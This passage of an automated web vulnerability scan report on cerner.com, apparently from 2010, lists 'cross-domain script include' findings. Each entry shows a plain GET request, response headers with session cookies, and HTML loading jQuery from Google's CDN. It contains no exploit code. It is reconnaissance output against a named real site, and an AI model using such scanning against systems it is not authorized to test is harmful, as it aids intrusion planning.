alt="Twitter" src="/include/img/ico-twitter.gif" /> ...[SNIP]...
|
4. Cross-domain script include
previous
next
There are 27 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
4.1. http://cerner.com/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET / HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: cerner.com
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; path=/ Set-Cookie: EktGUID=fe08f2c1-ffbc-4a01-9c67-6a34c504f953; expires=Fri, 11-Nov-2011 22:56:48 GMT; path=/ Set-Cookie: EkAnalytics=0; expires=Fri, 11-Nov-2011 22:56:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=i45s4a45toxhbwqmzssyho45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:56:49 GMT Content-Length: 15327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/home.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.2. http://cerner.com/About_Cerner/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/About_Cerner/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /About_Cerner/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:41 GMT Content-Length: 23185 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.3. http://cerner.com/About_Cerner/Careers/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/About_Cerner/Careers/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /About_Cerner/Careers/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:30 GMT Content-Length: 23147 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.4. http://cerner.com/ContactUs/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/ContactUs/ |
Issue detail
The response dynamically includes the following scripts from other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js
Request
GET /ContactUs/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:17:21 GMT Content-Length: 59349 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js"></script> ...[SNIP]...
|
4.5. http://cerner.com/Default.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/Default.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /Default.aspx HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:17:50 GMT Content-Length: 15327 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/home.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.6. http://cerner.com/GlobalPrivacy/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/GlobalPrivacy/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /GlobalPrivacy/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:57 GMT Content-Length: 29165 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.7. http://cerner.com/Privacy/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/Privacy/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /Privacy/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:55 GMT Content-Length: 32865 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.8. http://cerner.com/ScriptResource.axd
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/ScriptResource.axd |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /ScriptResource.axd HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 23:05:43 GMT Connection: close Content-Length: 12955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.9. http://cerner.com/Terms_Of_Use/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/Terms_Of_Use/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /Terms_Of_Use/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:17:36 GMT Content-Length: 51969 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.10. http://cerner.com/WebResource.axd
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/WebResource.axd |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /WebResource.axd HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:08 GMT Connection: close Content-Length: 12948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.11. http://cerner.com/about/Investor_Relations/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/about/Investor_Relations/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /about/Investor_Relations/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:42 GMT Content-Length: 22460 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.12. http://cerner.com/blog/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/blog/ |
Issue detail
The response dynamically includes the following scripts from other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js
Request
GET /blog/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:17:28 GMT Content-Length: 42647 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/yellow.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... </title> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js"></script> ...[SNIP]...
|
4.13. http://cerner.com/error.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/error.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /error.aspx HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 23:05:43 GMT Content-Length: 11327 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.14. http://cerner.com/events.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/events.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /events.aspx HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:17:24 GMT Content-Length: 20063 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/teal.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.15. http://cerner.com/solutions/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /solutions/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:07 GMT Content-Length: 38452 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.16. http://cerner.com/solutions/Employers/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Employers/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /solutions/Employers/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:02 GMT Content-Length: 22577 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.17. http://cerner.com/solutions/Homecare_Professionals/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Homecare_Professionals/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /solutions/Homecare_Professionals/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:08 GMT Content-Length: 25070 Connection: close
